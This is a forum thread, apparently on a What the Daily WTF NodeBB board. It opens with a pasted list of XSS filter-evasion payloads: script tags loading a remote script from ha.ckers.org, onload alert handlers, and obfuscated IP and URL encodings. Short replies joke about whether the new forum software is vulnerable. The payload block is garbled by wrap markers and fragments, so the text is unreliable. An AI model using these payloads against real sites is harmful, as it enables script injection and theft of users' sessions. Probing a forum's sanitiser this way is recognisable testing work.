ascript:alert('XSS'); jav ascript:alert('XSS'); Multiline w/Carriage Returns
      Non-Alpha/Non-Digit
      <SCRIPT/XSS »
      SRC="http://ha.ckers.org/xss »
      .js"></SCRIPT>
      Non-Alpha/Non-Digit Part 2

      <BODY » onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")> No Closing Script Tag <SCRIPT » SRC=http://ha.ckers.org/xss. » js Protocol resolution in script tags <SCRIPT » SRC=//ha.ckers.org/.j> Half-Open HTML/JavaScript alert("XSS");//< < < Malformed IMG Tags <script>alert("XSS")</SC » IMG Embedde RIPT>"> "> "> No Quotes/Semicolons <SCRIPT>a=/XSS/ alert(a.sour » ce)</SCRIPT> Evade Regex Filter 1 <SCRIPT a=">" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 2 <SCRIPT ="blah" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 3 <SCRIPT a="blah" '' » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 4 <SCRIPT "a='>'" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 5 <SCRIPT a=`>` » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Filter Evasion 1 <SCRIPT>document.write("<SCR » I");</SCRIPT>PT » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> PT » SRC="http://ha.ckers.org/xss » .js"> PT SRC="http://ha.ckers.org/xss.js"> Filter Evasion 2 <SCRIPT a=">'>" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> IP Encoding <A » HREF="http://66.102.7.147/"> » XSS</A> <a » href="http://66.102.7.147/"> » XSS</a> XSS URL Encoding <A » HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS</A> <a>XSS</a> XSS Dword Encoding <A » HREF="http://1113982867/">XS » S</A> <a href="/">XSS</a> XSS Hex Encoding <A » HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS</A> <a href="/">XSS</a> XSS Octal Encoding <A » HREF="http://0102.0146.0007. » 00000223/">XSS</A> <a href="/">XSS</a> XSS Mixed Encoding <A » HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS</A> <a » href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS</a> XSS Protocol Resolution Bypass <A » HREF="//www.google.com/">XSS » </A> <a>XSS</a> XSS Firefox Lookups 1 <A HREF="//google">XSS</A> <a href="//google">XSS</a> XSS Firefox Lookups 2 <A » HREF="http://ha.ckers.org@go » ogle">XSS</A> <a » href="http://google">XSS</a> XSS Firefox Lookups 3 <A » HREF="http://google:ha.ckers » .org">XSS</A> <a » href="http://google">XSS</a> XSS Removing Cnames <A » HREF="http://google.com/">XS » S</A> <a>XSS</a> XSS Extra dot for Absolute DNS <A » HREF="http://www.google.com. » /">XSS</A> <a>XSS</a> XSS JavaScript Link Location <A » HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS</A> <a>XSS</a> XSS Content Replace <A » HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A> <a » href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a> XSS</script>


  • This post is deleted!


  • Well, it's been hours since we switched to NodeBB and no one has found any obvious XSS exploits. So that beats Discourse.



  • @anonymous234 no, @Maciejasjmj found one.


Log in to reply
 

Looks like your connection to What the Daily WTF? was lost, please wait while we try to reconnect.